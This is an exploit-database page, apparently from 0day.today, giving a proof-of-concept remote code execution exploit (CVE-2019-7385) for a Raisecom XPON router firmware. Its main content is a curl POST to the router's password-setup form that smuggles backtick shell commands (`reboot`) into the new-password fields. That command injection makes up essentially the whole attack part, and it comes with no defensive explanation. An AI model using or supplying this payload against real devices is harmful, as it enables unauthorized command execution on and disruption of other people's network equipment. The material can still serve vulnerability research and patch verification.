[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution Exploit

Author
JameelNabbo
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-32304
Category
web applications
Date add
04-03-2019
CVE
CVE-2019-7385
Platform
hardware
# Exploit Title: Remote code execution in Raisecom xpon
# Exploit Author: JameelNabbo
# Website: Ordina.nl
# Vendor Homepage: https://www.raisecom.com
# Software Link: https://www.raisecom.com/products/xpon
# Version: ISCOMHT803G-U_2.0.0_140521_R4.1.47.002
# Tested on: MacOSX
# CVE-2019-7385

POC:
curl -i -s -k -X 'POST' \
-H 'Origin: http://127.0.0.1' -H -H 'Content-Type:
application/x-www-form-urlencoded' -H 'User-Agent: Chrome/7.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML,
like Gecko) Chrome/65.0.3325.181 Safari/537.36' -H 'Referer: http://192.168.1.1/password.asp' \
--data-binary
$'userMode=0&oldpass=netstat&newpass=`reboot`&confpass=`reboot`&submit-url=%2Fpassword.asp&save=Apply+Changes&csrf_token=current_cCSRF_ToKEN'
\
'http://192.168.1.1/boaform/formPasswordSetup'

#  0day.today [2024-11-15]  #